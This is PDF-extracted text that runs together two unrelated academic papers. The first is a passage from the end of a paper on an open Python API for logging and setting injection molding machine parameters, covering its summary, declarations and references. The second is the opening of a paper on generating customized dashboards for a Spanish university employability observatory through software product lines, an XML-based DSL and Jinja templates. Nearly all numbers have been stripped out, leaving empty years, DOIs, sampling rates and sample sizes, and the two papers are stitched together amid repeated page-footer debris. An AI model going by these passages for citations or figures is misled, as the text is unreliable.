as a result, if a parameter value that contradicts with the imm manufacturers’ safety principles is attempted to be set, the value will not be updated on the imm. at the same time, if a value is updated, in some cases, it might take time to reach the new stationary set point on the imm. at the moment, the proposed prototype does not check if the imm has reached the new value and this needs to be controlled by the imm operator/user. future work should include development of the corresponding classes for the prototype’s use with other data exchange protocols, such as euromap to enable connection to imms of other manufacturers; testing of the system with other injection molding machines; further development of the database management unit to allow storage of all the necessary process data. development of the prototype in terms of the real-time monitoring through implementation of the specialized process architecture (for example, non-blocking queues, concurrent read/write buffers) also needs to be continued. at the same time, a graphical user interface (gui) or a connector to an existing industry . process monitoring platform for the api needs to be implemented. the system’s security also needs to be worked on. in addition, a question of how often the data should be sampled needs further and deeper review. collaboration with imm manufacturers, as well as opc/ua working group would be highly beneficial for further development of the open api for imms and the injection molding process compliance with industry . paradigms. adding functionality of the proposed api to the commercially available mes would make them attractive to a broader range of users, including those interested in extensive research and analysis of the injection molding process. an important aspect of industry . is simplification of the integration and the communication across different units and machines at the shop floor (negri, fumagalli & macchi, ; kritzinger et al., ). a major motivation for the development of the api, is the possibility to enable easy access to machine tool and process parameters data during injection molding for several categories of imm users. in order to move towards industry . , both hardware and software should become more open (without compromising systems security and operational safety) for additional modifications by users instead of staying as restricted as it is. ogorodnyk et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. summary this paper has provided requirements, description of the development and capabilities of the open api prototype for injection molding machines. the interface is open for external interaction with the machine controller, allowing logging and setting values of process parameters. the openness of the prototype also provides possibilities for rapid algorithm prototyping and testing, when developing control strategies in the laboratory. the prototype has been tested at , , and hz sampling frequencies and can comply with the and hz rates. setting of the machine parameters, however, has not been performed during these tests. as to the authors’ knowledge, there are currently no such open systems available. similar functionality might be provided by commercially available mes, but these systems often have several limitations, such as: high cost, synchronization issues of data logged from injection molding machine and additional sensors, etc. 
the api prototype proposed in this paper is developed to provide soft real-time data communication between a pc and an imm through emi data exchange protocol, as well as allow connection with revpi for data acquisition from sensors installed in a mold. even though revpi has some advantages in terms of cost, openness and high flexibility, its main disadvantage is the low sampling rate and a more powerful daq might be necessary to acquire data with higher sampling rates. the interface delivers the possibility of logging up to machine and process parameters and allows building upon the api to integrate necessary data processing algorithms or other modules. the system has been developed using python programming language and is open for changes, such as adding euromap or other desirable data exchange protocols. distributed computing can be practiced with the help of this api to provide additional flexibility and robustness. the prototype is inspired by concepts of industry . and cyber-physical systems. the developed api prototype is based on necessity to move towards implementation of industry . and cyber-physical systems. the authors hope that it will be able to provide the necessary flexibility for rapid prototyping of methods and algorithms that can lead to enhancement of injection molding machines’ capabilities related to self-optimization and control. additional information and declarations funding this work was supported by the norwegian research council as part of the ‘‘megamould’’ project (project number: ) and through the sfi manufacturing project (project number: ). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: norwegian research council as part of the ‘‘megamould’’ project: . sfi manufacturing project: . ogorodnyk et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. competing interests mats larsen is a research scientist at sintef manufacturing and ole vidar lyngstad is a research director at sintef manufacturing. author contributions • olga ogorodnyk and mats larsen conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • ole vidar lyngstad conceived and designed the experiments, performed the experiments, authored or reviewed drafts of the paper, and approved the final draft. • kristian martinsen conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: the code is available on github: https://github.com/sintefmanufacturing/imm_api supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references ageyeva t, horváth s, kovács jg. . in-mold sensors for injection molding: on the way to industry . . sensors ( ): doi . /s . arburg. . host computer system (als). available at https://www.arburg.com/en/ products-and-services/injection-moulding/production-management/host-computer- system-als/ (accessed on june ). baker b. . how delta-sigma adc work, part . dallas, texas, usa: texas instru- ments incorporated. charest m, finn r, dubay r. . 
integration of artificial intelligence in an injection molding process for on-line process parameter adjustment. in: annual ieee international systems conference (syscon). piscataway: ieee. euromap. . euromap –data exchange interface between injection moulding machines and mes. available at https://opcfoundation.org/markets-collaboration/ plastics-and-rubber-machinery/ (accessed on june ). iso. . iso - : plastics –determination of tensile properties –part : test conditions for moulding and extrusion plastics. available at https://www.iso.org/ standard/ .html (accessed on june ). jacobson i, booch g, rumbaugh j. . the unified process. ieee software ( ): – . kraussmaffei. . maxecution. available at https://km.kraussmaffei.com/imm-en/ maxecution.html (accessed on june ). ogorodnyk et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/sintefmanufacturing/imm_api http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /s https://www.arburg.com/en/products-and-services/injection-moulding/production-management/host-computer-system-als/ https://www.arburg.com/en/products-and-services/injection-moulding/production-management/host-computer-system-als/ https://www.arburg.com/en/products-and-services/injection-moulding/production-management/host-computer-system-als/ https://opcfoundation.org/markets-collaboration/plastics-and-rubber-machinery/ https://opcfoundation.org/markets-collaboration/plastics-and-rubber-machinery/ https://www.iso.org/standard/ .html https://www.iso.org/standard/ .html https://km.kraussmaffei.com/imm-en/maxecution.html https://km.kraussmaffei.com/imm-en/maxecution.html http://dx.doi.org/ . /peerj-cs. kritzinger w, karner m, traar g, henjes j, sihn . . digital twin in manufac- turing: a categorical literature review and classification. ifac-papersonline ( ): – . kurose jf, ross kw. . computer networking: a top-down approach. boston: pearson addison wesley. kurt m, kamber os, kaynak y, atakok g, girit o. . experimental investigation of plastic injection molding: assessment of the effects of cavity pressure and mold tem- perature on the quality of the final products. materials & design ( ): – doi . /j.matdes. . . . kurt m, kaynak y, kamber os, mutlu b, bakir b, koklu u. . influence of mold- ing conditions on the shrinkage and roundness of injection molded parts. the international journal of advanced manufacturing technology ( – ): – doi . /s - - -x. lee j, kao ha, yang sh. . service innovation and smart analytics for industry . and big data environment. product services systems and value creation: proceedings of the th cirp conference on industrial product-service systems : – . lee ea, seshia sa. . introduction to embedded systems: a cyber-physical systems approach. cambridge, massachusetts london, england: mit press. maciaszek l, liong bl. . practical software engineering: an interactive case-study approach to information systems development. boston: pearson addison wesley. madeyski l, sochmialek m. . architectural design of modern web applications. foundations of computing decision sciences ( ): – . mahmoud mi, hassan ammar h, hamdy mm, hassan eissa m. . production operation management using manufacturing execution systems (mes). in: th international computer engineering conference (icenco). ieee. mdpv. . manufacturing execution system hydra. available at https://www.mpdv. com/en/products-solutions/mes-hydra/#c - (accessed on july ). negri e, fumagalli l, macchi m. . 
a review of the roles of digital twin in cps-based production systems. procedia manufacturing : – doi . /j.promfg. . . . ogorodnyk o, martinsen k. . monitoring and control for thermoplastics injection molding a review. procedia cirp : – doi . /j.procir. . . . osswald ta, hernandez-ortiz jp. . polymer processing modeling and simulation. munich: carl hanser verlag, . polmak_plastik. . polmak plastik products. available at https://www.polmakplastik. com/en/productsdetail-manufacturing-execution-systems-mes-products- .html (accessed on july ). pyro. . python remote objects - . . available at https://pypi.org/project/pyro / (accessed on june ). python software foundation. . gc - garbage collector interface. available at https: //docs.python.org/ /library/gc.html (accessed on june ). ogorodnyk et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.matdes. . . http://dx.doi.org/ . /s - - -x https://www.mpdv.com/en/products-solutions/mes-hydra/#c - https://www.mpdv.com/en/products-solutions/mes-hydra/#c - http://dx.doi.org/ . /j.promfg. . . http://dx.doi.org/ . /j.procir. . . https://www.polmakplastik.com/en/productsdetail-manufacturing-execution-systems-mes-products- .html https://www.polmakplastik.com/en/productsdetail-manufacturing-execution-systems-mes-products- .html https://pypi.org/project/pyro / https://docs.python.org/ /library/gc.html https://docs.python.org/ /library/gc.html http://dx.doi.org/ . /peerj-cs. revpi. a. how to configure analog input. available at https://revolution.kunbus.com/ tutorials/uebersicht-aio- /analoge-eingaenge-konfigurieren- / (accessed on july ). revpi. b. industrial raspberry pi. available at https://revolution.kunbus.com/ revolution-pi-series/ (accessed on june ). saldivar aaf, goh c, li y, yu h, chen y. . attribute identification and predictive customisation using fuzzy clustering and genetic search for industry . environ- ments. in: software, knowledge, information management & applications (skima), th international conference on. ieee. sap. . sap manufacturing execution. available at https://www.sap.com/products/ execution-mes/technical-information.html#extensibility (accessed on july ). tellaeche a, arana r. . rapid data acquisition system for complex algorithm testing in plastic molding industry. international journal of mechanical, aerospace, industrial, mechatronic and manufacturing engineering ( ): – . tig. . tig authentig. available at https://www.tig-mes.com/en/software/tig- authentig/ (accessed on may ). vrabič r, kozjek d, butala p. . knowledge elicitation for fault diagnostics in plastic injection moulding: a case for machine-to-machine communication. cirp annals ( ): – doi . /j.cirp. . . . yin s, ding sx, xie x, luo h. . a review on basic data-driven approaches for industrial process monitoring. ieee transactions on industrial electronics ( ): – doi . /tie. . . zhang y, mao t, huang z, gao h, li d. . a statistical quality monitoring method for plastic injection molding using machine built-in sensors. the inter- national journal of advanced manufacturing technology ( – ): – doi . /s - - - . zhao p, zhou h, he y, cai k, fu j. . a nondestructive online method for monitor- ing the injection molding process by collecting and analyzing machine running data. the international journal of advanced manufacturing technology ( – ): – doi . /s - - - . zheng r, tanner ri, fan x-j. . injection molding: integration of theory and modeling methods. berlin, heidelberg: springer science & business media. 
zhou x, zhang y, mao t, zhou h. . monitoring and dynamic control of quality stability for injection molding process. journal of materials processing technology : – doi . /j.jmatprotec. . . .
submitted november accepted june published july corresponding author andrea vázquez-ingelmo, andreavazquez@usal.es academic editor helen petrie additional information and declarations can be found on page doi . /peerj-cs. copyright vázquez-ingelmo et al. distributed under creative commons cc-by . open access
taking advantage of the software product line paradigm to generate customized user interfaces for decision-making processes: a case study on university employability
andrea vázquez-ingelmo, francisco j. garcía-peñalvo and roberto therón
grial research group, department of computer science and automatics, university of salamanca, salamanca, spain; visusal research group, department of computer science and automatics, university of salamanca, salamanca, spain
abstract university employment and, specifically, employability has gained relevance since research in these fields can lead to improvement in the quality of life of individual citizens. however, empirical research is still insufficient to make significant decisions, and relying on powerful tools to explore data and reach insights on these fields is paramount. information dashboards play a key role in analyzing and visually exploring data about a specific topic or domain, but end users can present several necessities that differ from each other, regarding the displayed information itself, design features and even functionalities.
by applying a domain engineering approach (within the software product line paradigm), it is possible to produce customized dashboards to fit into particular requirements, by the identification of commonalities and singularities of every product that could be part of the product line. software product lines increase productivity, maintainability and traceability regarding the evolution of the requirements, among other benefits. to validate this approach, a case study of its application in the context of the spanish observatory for university employability and employment system has been developed, where users (spanish universities and administrators) can control their own dashboards to reach insights about the employability of their graduates. these dashboards have been automatically generated through a domain specific language, which provides the syntax to specify the requirements of each user. the domain language fuels a template-based code generator, allowing the generation of the dashboards’ source code. applying domain engineering to the dashboards’ domain improves the development and maintainability of these complex software products given the variety of requirements that users might have regarding their graphical interfaces. subjects human–computer interaction, software engineering keywords spl, dsl, domain engineering, dashboards, employability, code generation how to cite this article vázquez-ingelmo a, garcía-peñalvo fj, therón r. . taking advantage of the software product line paradigm to generate customized user interfaces for decision-making processes: a case study on university employability. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com mailto:andreavazquez@usal.es https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. introduction the concept of employability has increasingly gained relevance over the last decades. there is a reason: knowing which factors increase the possibility to obtain a job or to perform better in current job positions could be decisive to improve individual and collective life quality. however, this concept is still far away from having a straightforward definition (chadha & toner, ). as the literature suggests, employability can be seen as a capability to gain employment or as a set of skills and knowledge required to perform effectively in the workplace, among other definitions (universities uk & confederation of british industry, ; hillage & pollard, ; yorke, ). this lack of consensus when defining employability makes the research in this field a complicated task, given the fact that the definition of its factors depends on the perspective used to evaluate it, as well as the socioeconomic context in which employability and employment studies are framed. for these reasons, nowadays research on employability asks for an exploratory approach, to build stronger theoretical foundations. researching on employability has many potential benefits, aiming not only at knowing the variables that affect the capability to gain employment and have a successful work career, but also to exploit this knowledge to help policymakers and institutions with their missions. this knowledge can contribute to the creation of greater policies, focusing on the detected factors to enhance people’s chances to obtain better employment. 
specifically, educational institutions like universities could benefit from this knowledge. these institutions play a vital role regarding the employability of individuals (garcía-peñalvo, ), as they are in charge of transmitting knowledge and a series of skills to their students. by promoting the most relevant skills and capabilities that affect employability, it could be possible to increase the alignment of education with the labor market. however, generating knowledge in such a study field is not a trivial task. as it has been introduced, there could be several variables involved in the research of students’ employment and employability, so it is necessary to collect significant data volumes to be able to reach valuable insights. in addition to data collection, performing data analysis (albright, winston & zappe, ) is required to be able to reach useful insights. it is worth noting that analyzing employability data to identify and understand its factors could become a cornerstone in decision-making processes within educational institutions. nevertheless, even after performing data analysis, identifying patterns and indicators derived from the analysis outcomes remains a complex challenge. that is why it is crucial to assist decision-makers with powerful tools that allow reaching insights about the domain of the problem, to support decisions with complete and quality information (especially in the academic context, where these processes might have a series of social implications), that is, information and knowledge that has been extracted through visual analysis. information dashboards are one of the most commonly used software products for visual data analysis and knowledge extraction (few, ; sarikaya et al., ). in a domain like employability, these tools can support exploratory studies through a set of graphical and interactive resources, allowing users to envision data more understandably (tufte & graves-morris, ) and identify relevant relations, indicators or patterns among vázquez-ingelmo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. large sets of data. it is essential to bear in mind that information dashboards are not just a set of aesthetic graphs and visualizations; they have to effectively transmit information to answer the questions of the users regarding the target domain. moreover, this is not a trivial job, because of two main reasons: data and users themselves. on the one hand, users do not have a set of standard and static requirements; they could demand different features or design attributes given their specific goals or needs. on the other hand, data is continuously increasing and evolving nowadays, so it is foreseeable that new information requirements will arise in time. returning to the employability subject, information requirements in this domain might change in many different ways as this concept could demand new kind of variables or larger amounts of data to explore emerging dimensions or to perform more in-depth analyses. for these reasons, information dashboards not only need to be useful concerning functionality but also be customizable to adapt to specific user requirements. also, they should be flexible and scalable regarding its data sources and structures, making the development and maintenance of information dashboards even more complicated. 
of course, these issues could be addressed by developing particular dashboards for each involved user to achieve every specific goal, but clearly, this solution would be time- consuming and would require a lot of resources during the development and maintenance phases. also, scalability would be almost impossible, as new users or changes in the requirements would necessarily imply more resources. there are, nevertheless, a series of strategies to deal with these challenges. specifically, software engineering paradigms like software product lines (clements & northrop, ; gomaa, ; pohl, böckle & van der linden, ) provide powerful theoretical frameworks to address flexibility, scalability and customization in software products that share sets of features within a common domain. through the analysis of commonalities and variability points in the product domain, it would be possible to reduce the development and maintenance effort of building tailor-made solutions. this paradigm is potentially applicable to dashboards since these software products could be factored into sets of configurable components with configurable features. this paper describes the application of the spl methodology to the dashboards’ domain through the study of their characteristics and the definition of a dsl to manage the product derivation automatically. the main focus of this research is to test the potential usefulness and feasibility of this approach to manage fine-grained features that can be scattered through different code assets, and consequently, to provide a base method for generating personalized dashboard solutions to fit concrete user requirements. the remainder of this work is structured as follows. background discusses the background of the problem of generating customized dashboards as well as their application to the employment and employability domain. context presents the application context and the motivation behind this pilot framework to generate dashboards to support visual analysis on university employment and employability data (framed within the spanish observatory for university employability and employment studies. materials and methods describes the techniques used for the development of an initial approach to a generative dashboard framework. finally, the results section exhibits the outcomes of this research to vázquez-ingelmo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. conclude with the discussion of the developed spl and the conclusions derived from these results. background the main idea behind software product lines (spls) is that the final products can be derived from a set of configurable core assets, allowing their adaptation to fit specific requirements. these core assets are developed during the domain engineering phase, in which commonality and variability of the target product domain are identified to build a common base of components. core assets are developed with variability points in which specific functionalities could be injected to obtain new products. functionalities in spls are seen as features; the combination of the defined features within the scope of the line (generally following a feature model (kang et al., ) allow stakeholders to build personalized products by reusing and assembling software components. 
the spl paradigm has been applied to a variety of domains: mobile applications (marinho et al., ; nascimento, ; quinton et al., ); applications for visualizing population statistics (freeman, batory & lavender, ); sensor data visualizations (logre et al., ); variable content documents (gómez et al., ); or e-learning systems (ezzat labib awad, ). these practical applications have proved the benefits of this paradigm. however, features usually refer to the software’s logic, deflecting attention to the presentation layer. the idea of generating customized dashboards can be seen as a specific case of graphical user interfaces (gui) automatic generation within spls. user interfaces require additional work regarding their implementation; they not only need to be functional but also usable to allow users to complete their tasks efficiently and achieve their goals. that is why the design of user interfaces is present through the whole development process, being time- and resource-consuming job. automation regarding gui generation in software product lines has already been faced in several works. generally, there is a lack of usability on the generated products that can be addressed by manually designing every product gui. but this approach is highly inefficient in the spl paradigm context since all the development time saved could be lost by introducing a manual task (hauptmann et al., ). integration of the gui design process and the spl paradigm is required to leverage the benefits of the two approaches (pleuss, botterweck & dhungana, ). there is, as pleuss et al. ( a); pleuss et al. ( b) pointed out, a dilemma between automation and usability. to address this challenge, they utilized model-based ui development (mbuid) methods to separate the functionality and the appearance of the gui (pleuss, botterweck & dhungana, ). on the other hand, gabillon, biri & otjacques ( ) demonstrated the possibility of creating adaptive user interfaces through the dynamic spl (dspl) paradigm and mbuid models by developing a context-aware data visualization tool that can be adapted during runtime. dspls provide a useful paradigm for adapting code at run-time, obtaining adaptive guis. kramer et al. ( ) proposed document-oriented guis with run-time variations vázquez-ingelmo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. through xml documents (kramer et al., ). this context-adaptable feature has also been achieved by sboui, ayed & alimi ( ), by developing a mobile application that is also runtime adaptable through mbuid models and reusable artifacts. in this particular case, the code generation is based on extensible stylesheet language transformations (xslt) and xml files (sboui, ayed & alimi, ). these works shows not only the viability of gui generation in the spl/dspl paradigms context but also their valuable benefits. it seems evident that gui customization requires fine-grained features to achieve the desired usability and design attributes. fine-grained features mostly require annotative approaches regarding their implementation, given their specialization. annotative approaches can address this issue because annotations can be arbitrarily specified at different source code fragments (kästner & apel, ; kästner, apel & kuhlemann, ), and provide a framework for fine-grained automated software composition through feature structure trees (apel, kastner & lengauer, ). 
there are different approaches to manage the implementation of variability at a fine- grained level (gacek & anastasopoules, ). especially, frame- and template-based approaches provide valuable solutions to address this fine-grained level of variability, allowing the injection of particular fragments of code at any point of the base source code. frame-based languages, like xml-based variant configuration language (xvcl) (jarzabek et al., ), provide a syntax to combine and insert fragments of code through the definition of frames, allowing the separation of concerns regarding the spl implementation (zhang, jarzabek & swe, ). templating can also achieve valuable results; templating libraries such as jinja (ronacher, ) provide powerful functionalities to annotate the source code independently of the target programming language (clark, ; ridge, gaspar & ude, ). the generation of gui within the context of a product family is still a convoluted field, although the previous work has enlightened the path to improve and leverage the automation and generation of these complex software elements. the complexity mainly comes from human factors and the vast variety of requirements regarding user interfaces. this work aims to present an application of the spl paradigm, in this case on the dashboards’ domain, considering the fine-grained nature of their features and the necessity of customizing its interaction methods and visual appearance. context the application of this work is framed within the spanish observatory for university employment and employability. the following subsections describe this organization’s mission and the motivation to generate personalized dashboards to explore its data. the observatory for university employment and employability the observatory for university employment and employability (also known as oeeu, its spanish acronym, http://oeeu.org) is an organization with the vision of becoming an information reference for understanding and exploiting knowledge about employment and employability of students from spanish universities. to do so, this network of researchers and technicians conduct studies about these fields in the academic context (michavila et vázquez-ingelmo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://oeeu.org http://dx.doi.org/ . /peerj-cs. al., a; michavila et al., ; michavila et al., b), through a data-driven approach to recollect, analyze, visualize and disseminate employment and employability data of graduates from spanish universities. firstly, in the data collection phase, universities provide their administrative records and, once this phase is completed, their students answer a questionnaire about different aspects of their education and work career. this process leaves the observatory with a significant set of variables from the students’ sample. for instance, in the study edition, more than variables were gathered from , bachelor students. moreover, in the study edition, variables were gathered from , master degree students. the volume of the data collected makes the presentation of the study results to the observatory ecosystem’s users a challenge, as the latter may have different requirements and necessities regarding the studies’ data. for these reasons, an approach based on domain engineering fits the oeeu’s needs, allowing an efficient generation of customized dashboards that meet different requirements. 
motivation as it has been introduced, employment and employability are complex study fields that mainly ask for exploratory analysis, given its relatively initial status of research. in the context of the spanish observatory for university employment and employability, where a vast set of variables from significant quantities of students are recollected, it is crucial to rely on exploratory visualizations that allow users and administrators to identify at a glance unusual patterns or important data points by enhancing the understanding of the presented information (card, ). in contrast with explanatory visualizations, in which the primary purpose is to tell a story through data, exploratory tools aim to facilitate users to pose more questions as data is being explored. in essence, explanatory analyses start from a question and use data to answer it. exploratory analysis, on the other hand, uses data to detect new avenues of research. for instance, when a user does not have a clear question about the data, it will use exploratory research to find patterns or relations among variables. this same user could employ the acquired knowledge to explain the insights reached through previous explorations using an explanatory visualization. exploratory visualizations rely intensely on interaction to provide their functionality and to allow users to drill-down datasets, being able to discover new aspects of the domain by directly communicating with the graphical interface. however, an interaction can take many forms, and there is not a single solution to obtain usable and intuitive interfaces valid for every user. for instance, some users could find useful a visible control panel to manage data if they are going to apply filters, aggregations and so on intensively. on the other hand, other users can demand in-place interaction if they give more importance to having more space for the visualizations (instead of having a permanent control panel consuming screen space). another example is that users that speak a left-to-right (ltr) or a right-to-left (rtl) language would demand different layouts for the same task, according to their sociodemographic or cultural context (almakky, sahandi & taylor, ; marcus & gould, vázquez-ingelmo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. ). also, visualization novices could require task-oriented dashboards to support their visual analysis, since their past experience with this kind of tools is a relevant factor when interacting with a system (elias & bezerianos, ). once patterns, relations between variables and interesting dimensions have been identified through the exploration of data, even the exploratory nature of a dashboard can change for a more explanatory purpose to present the results understandably and strikingly. for all these reasons dashboards, their components, their interaction, and even their primary purpose need advanced configuration and customization to fit into different contexts and requirements. moreover, as it has been aforementioned, spls provide a potential solution to efficiently address this customization since visual components and interaction methods could be treated as features of the product line, decreasing the resources needed during the development and maintenance of dashboards. 
materials & methods this section presents the materials and techniques used during the development of this first approach to a framework for generating dashboards to explore employment- and employability-related variables. meta-model the problem to address requires abstract modelling to capture basic features within the dashboards’ domain. to do so, a meta-model is proposed. meta-models are a crucial artefact in model-driven engineering and model-driven architectures (kleppe, warmer & bast, ), as they allow to define a high-level view of the domain without depending on specific technologies. therefore, meta-models should remain as simple as possible to eventually, through a series of mappings and transformations, obtain concrete models (Álvarez, evans & sammut, ). for this generic dashboards’ domain, the meta-model found in fig. is proposed. first of all, a specific user could handle a dashboard. this dashboard could be composed of one or more pages, being these last composed, in turn, by one or more containers. a container could be seen as a row or a column, and it can recursively contain more containers. the container recursion ends with a component, which is any graphic element that can be used in a dashboard. the recursion mentioned above allows the arrangement of any layout by the recurrent combination of rows and columns. this meta-model eases the vision of the dashboards’ domain, and it also allows to identify the common base of any dashboard. feature model the meta-model gives a high-level vision of the dashboards’ domain. however, it does not capture concrete features. that is why software product lines rely on feature models (kang et al., ) to identify common and variable assets. feature models not only serve as a documentation element but also as an important artifact within the development process. the implementation of the core assets and the materialization of variability points on the code must be guided by the previously defined feature model. vázquez-ingelmo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure dashboard meta-model. the dashboard meta-model allows a high level view of the target do- main. full-size doi: . /peerjcs. /fig- in this domain, the feature model will capture the dashboards’ visualization components, as well as individual features and restrictions of each visualization. the hierarchical structure of the feature model allows to define high-level characteristics and refine them through the tree structure until reaching the lower-level features (i.e., fine-grained features). this structure makes the scalability of features easier, since adding new features involves the addition of new nodes to the feature tree uniquely. for the observatory’s dashboards, three main configurable visual components (features) have been defined: a scatter diagram, a chord diagram and a heat map. these visualizations address the requirements of the observatory’s data but can be reused for other data domains. also, it is possible to specify a global filter that affects the data of all components previously defined. these high-level features of the dashboards’ product line are presented in fig. . a detailed view of the scatter diagram feature can be seen in fig. . it has a set of subsequent features, either mandatory, optional or alternative. one mandatory feature is the base logic of the scatter diagram (i.e., the component layout construction and its primary logic). 
another mandatory feature is the initial data that the diagram will be showing on different dimensions since it must be specified. among the optional features, it is possible to determine whether a tooltip will show up when hovering on data points if a set of controls will support the data exploration, or the capacity to zoom or export the diagram. also, a title for the visualization can be included. vázquez-ingelmo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure high-level view of the feature diagram. this feature diagram shows high-level components that could compose the dashboard. full-size doi: . /peerjcs. /fig- figure high-level view of the scatter diagram component’s features. this snippet of the feature model shows the possible features regarding the scatter diagram component. full-size doi: . /peerjcs. /fig- for the sake of simplicity, some of the lower-level features have been omitted in fig. . for instance, the bar and panel control features have subsequent features. the detailed features for a panel type control are shown in fig. to provide an example. a control panel will rely on its underlying logic, and it can count on different optional features, like data selectors to dynamically change the visualization’s presented data; in case of the x and y axes, these selectors could be located within the control panel space or in-place controls (i.e., situated near the scatter diagram axes). other possible features involve having an overview that shows a detailed view of a data point when hovering, data filters, among others. the feature diagram provides a high-level and organized overview of the spl, improving the organization of the source code and development tasks. domain-specific language there is, however, a necessity of connecting the previous models to the dashboards’ source code to be generated (voelter & visser, ). a domain-specific language (dsl) has been designed to accomplish this connection. this dsl is based on the identified domain’s features, by structuring them with xml technology (bray et al., ) and by validating the model restrictions with an xml schema (fallside, ). xml technology provides vázquez-ingelmo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure high-level view of a component’s panel subsequent features. this part of the feature diagram shows lower-level features regarding the components’ control panel. full-size doi: . /peerjcs. /fig- figure snippet of the dsl schema. it is possible to specify the dashboard layout and its elements (i.e., data filters, components, etc.). full-size doi: . /peerjcs. /fig- a readable and easy-to-parse manner for injecting functionalities or requirements in a system, fostering flexibility since these rules are not directly defined (or hard-coded) in the source code. the following examples describe the dsl developed for this work. following the meta-model, every dashboard will be composed by one or more pages, each page with its configuration (i.e., layout and components, as seen in fig. ), and each page component with its setting (given the feature model, as seen in fig. ). 
data resources of each visual component are represented by the xsd generic type ‘‘anytype’’, to decouple the data structure and format from the presentation, and also to open up the possibility of injecting dynamic data sources without affecting the dsl syntax. vázquez-ingelmo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure dsl schema regarding the specification of the dashboard components. it is possible to see the link between the feature model elements and the xml schema elements (e.g., the components that could compose the dashboard). full-size doi: . /peerjcs. /fig- figure dsl schema regarding the specification of the scatter diagram component. this part of the dsl represents the available features for the scatter diagram component. full-size doi: . /peerjcs. /fig- in figs. and the resemblance of the xml schema structure with the feature model can be appreciated. the hierarchical nature of xml matches with the hierarchical structure of feature diagrams. this resemblance allows better traceability of the features involved in the product line, because the syntax of the dsl is obtained from the feature model, thus providing a computer-understandable specification of the spl, necessary to process the requirements and to automate the dashboard generation. in this current approach, the dashboard’s feature model serves as documentation, but, as it will be discussed, it would be extremely valuable to create a programmatic link between this model and the dsl specification, in order to propagate and reflecting any feature model change automatically in the dsl, improving maintainability. finally, fig. shows how the layout of the dashboard is specified in terms of rows, columns and components (following, again, the meta-model previously presented). the vázquez-ingelmo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure xml type for specifying the dashboard’s layout. the dashboard layout (previously modeled through the dashboard meta-model) is specified by creating a custom type. full-size doi: . /peerjcs. /fig- dsl combines both the meta-model and feature model designs to obtain a specific syntax to configure all the aspects regarding the generation of final products. the whole schema for the dsl can be consulted at the following github repository https://github.com/andvazquez/dashboard-spl-assets (vázquez-ingelmo, ). code generator to put together all the developed assets and concepts, a code generator has been developed to manage the generation of functional dashboards. the generator interprets the dsl (i.e., xml configuration files) and selects the appropriate template (i.e., core assets of the spl) to configure them by injecting the chosen features, obtaining the dashboards’ final source code. the code templates and xml configuration files are managed by the developers following the elicited user requirements. the inputs and outputs of the code generator can be seen in fig. . code templates the next challenge regarding the implementation of this spl involves the choice of the techniques for materializing the product line’s variability points. in this case, personalization is focused on the visual elements of the system’s presentation layer, which require fine-grained variability (kästner & apel, ). 
coarse-grained variability involves the addition and removal of full components, which is also useful for this approach (users may prefer a scatter diagram over a chord diagram to achieve their goals, removing the latter from the dashboard). however, visual components themselves (referring to the elements that compose them) also require high variability to fit different requirements, so fine-grained variability needs to be accomplished.

figure: code generator inputs and outputs. the code generator is fed with the code templates and the xml configuration files to provide the final source code of the dashboard.

there exist different approaches to implement fine-grained software composition, such as featurehouse (apel, kastner & lengauer, ), which uses superimposition and feature structure trees (fsts); however, not every method supports the currently required granularity, which involves even statement-level variability. fine granularity often prohibits superimposition approaches (apel, kästner & lengauer, ). the mechanism chosen to reach the desired feature granularity is based on template engines. template engines allow tagging sections and parameterizing units of source code so that concrete values can be injected later to obtain complete source files. this mechanism fulfills the need to materialize the variable features of a tangible product of the line. jinja (ronacher, ) was selected as the engine for developing the core assets of this spl. this template engine allows the definition of custom tags, filters and even macros, the last being essential for organizing the core assets. as described by kästner & apel ( ), fine-grained approaches can make the source code tedious to read and maintain. by declaring every variant feature in a different macro and composing them subsequently, it is possible to achieve high cohesion and loose coupling in the spl feature implementation process, improving reusability and source code organization by grouping the different functionalities under their parent feature. there was no need to implement extensions of the jinja mechanisms, as its current syntax was sufficient for the annotative approach followed.

figure: workflow of the code generation process. a simplified view of the code generator behavior.

